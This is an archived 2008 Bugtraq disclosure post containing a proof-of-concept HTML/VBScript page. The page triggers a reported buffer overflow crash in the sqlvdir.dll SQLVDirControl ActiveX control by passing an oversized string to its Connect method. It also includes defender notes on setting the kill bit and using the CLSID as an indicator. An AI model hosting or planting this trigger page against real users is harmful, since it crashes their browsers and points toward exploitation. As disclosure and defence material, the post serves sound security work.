Message-Id: <200809111021.m8BAL6H4022144@www5.securityfocus.com>
Date: Thu, 11 Sep 2008 04:21:06 -0600
From: beenudel1986@...il.com
To: bugtraq@...urityfocus.com
Subject: sqlvdir.dll ActiveX Remote Buffer Overflow Exploit
# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - r4s4al #
# ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE #
# and all darkc0de members ---#
################################################################
#
# Author: Beenu Arora
#
# Home : www.BeenuArora.com
#
# Email : beenudel1986@...il.com
#
# Share the c0de!
#
################################################################
#
# sqlvdir.dll ActiveX Remote Buffer Overflow Exploit
#
# Successful exploitation crashes the browser
#
# Tested On : WinXp Sp-2 IE 6.0
#
#################################################
# Loaded File: C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlvdir.dll
# Class SQLVDirControl
# GUID: {FC13BAA2-9C1A-4069-A221-31A147636038}
# Number of Interfaces: 1
# Default Interface: ISQLVDirControl
# RegKey Safe for Script: False
# RegkeySafe for Init: False
# KillBitSet: False
#################################################
<html>
<!--
  Proof-of-concept page for the SQLVDirControl ActiveX control in sqlvdir.dll.
  It instantiates the control by CLSID and calls its Connect method once with
  an oversized, malformed second argument. The advisory header reports only a
  browser crash (tested on WinXP SP2 / IE 6.0); the "buffer overflow"
  classification is the author's, and nothing on this page shows the fault
  being analysed further.

  Defender notes:
  * The header lists "Safe for Script: False", "Safe for Init: False" and
    "KillBitSet: False". NOTE(review): with those flags, whether a web page
    may script the control depends on the IE zone setting for ActiveX
    controls not marked safe for scripting; confirm the policy for each zone.
  * Setting the kill bit for this CLSID (DWORD "Compatibility Flags" = 0x400
    under HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\
    {FC13BAA2-9C1A-4069-A221-31A147636038}) stops IE from instantiating it.
  * The classid string in the object tag below is a usable indicator when
    searching proxy logs or cached pages for attempts to load the control.
-->
Test Exploit page
<object classid='clsid:FC13BAA2-9C1A-4069-A221-31A147636038' id='target' ></object>
<script language='vbscript'>
' The next five assignments are never read by this script.
' NOTE(review): they look like report metadata from an ActiveX fuzzing tool
' (file, prototype, member, ProgID, argument count); confirm the origin.
targetFile = "C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlvdir.dll"
prototype = "Sub Connect ( [ ByVal szServer As Variant ] , [ ByVal szWebSite As Variant ] )"
memberName = "Connect"
progid = "SQLVDIRLib.SQLVDirControl"
argCount = 2
' arg1 is passed positionally as szServer, arg2 as szWebSite (see prototype).
arg1="defaultV"
' arg2 is the input associated with the crash: a long URL-like string mixing
' backslashes with the characters ? @ . : # $ %.
' NOTE(review): the literal is hard-wrapped over five lines in this copy,
' presumably by the mail archive.
arg2="http://test\test\test\te?s\test\test\tes\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\test\tes\test\te
st\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:#$%\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test
\test\tes\test\test\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:#$%\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\tes
t\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:#$%\ttest\test\te@st\tes\test\test\tes.\ttest\test\
test\tes\test\test\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\"
' Single method call on the instantiated control; per the header this is
' where the browser crash is observed.
target.Connect arg1 ,arg2
</script>